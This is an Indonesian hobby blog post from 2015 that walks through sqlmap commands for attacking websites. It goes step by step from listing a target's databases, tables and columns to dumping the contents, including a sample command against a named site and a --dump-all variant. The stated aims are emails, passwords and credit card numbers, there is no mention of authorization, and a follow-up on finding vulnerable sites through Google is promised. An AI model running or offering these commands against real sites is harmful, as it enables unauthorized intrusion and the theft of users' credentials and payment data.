Berbagi Ilmu Seputar Dunia Internet

Rabu, 04 Maret 2015

On 06.03 by Unknown in ,
Wuihh baca judulnya serem banget yah? Perintah-perintah SQLMAP untuk Hacking Website. Yah, ini cuma sharing ilmu saja dari seorang newbie tentang keingintahuanya dalam dunia hacking. Pada kesempatan yang bahagia ini saya mau berbagi tentang perintah-perintah sqlmap tepatnya untuk mengetahui isi database dari sebuah website, seperti informasi email, password dan bahkan kalau beruntung terdapat informasi nomor kartu kredit dari seorang user wkwkwk.

Oke cekidot saja inilah beberapa perintah-perintah dasar sqlmap untuk hacking website :

  • sqlmap.py -u url_target --dbs
Perintah ini digunakan untuk mengambil semua nama database di server. Isi link target dengan web tujuan kalian wkwk.
  • sqlmap.py -u url_target -D nama_database --tables
Perintah ini digunakan untuk mengambil semua table dari suatu database. nama_database isi dengan nama database yang ingin ditampilkan semua tablenya.
  • sqlmap.py -u url_target -D nama_database -T nama_table --columns
Perintah ini digunakan untuk menampilkan semua column dari sebuah table yang ada di sebuah database server. Ganti nama tablenya sesuai dengan nama table yang ada di database target masing-masing.
  • sqlmap.py -u url_target -D nama_database -T nama_table -C nama_columns --dump
Perintah ini digunakan untuk menampilkan isi dari semua data dari sebuah table. isi nama nama_columns dengan kolom-kolom yang ada di table tersebut. Contoh penulisanya seperti ini :
sqlmap.py -u iangoblog.com/user.php?id=2 -D iangoblog -T users -C email,username,password --dump

Tapi kalau kalian ingin langsung saja mengambil semua data yang ada di database servernya, kalian bisa langsung menuliskan perintah di bawah ini dan kalian tinggal hanya menunggu saja. Kecepatan tergantung dengan kecepatan internet yang kalian punya. Perintahnya sebagai berikut :
sqlmap.py -u iangoblog.com/user.php?id=2 --dump-all - tekan enter

Mungkin cukup sekian perintah-perintah sqlmap yang saya tau hehe. Kurang lebihnya cari saja sendiri yah di google wkwkw. Dan bagaimana sih untuk mencari website yang lemah dan bisa diambil data-data di databasenya? Jawabanya adalah nanti di postingan mendatang saya akan berbagi tentang Cara Mencari Website Vulnerable Dengan Menggunkan Mesin Pencari Google hehe . Tunggu saja yah, dan jangan bosen untuk selalu berkunjung ke blog butut ini hehe.

Wassalammm....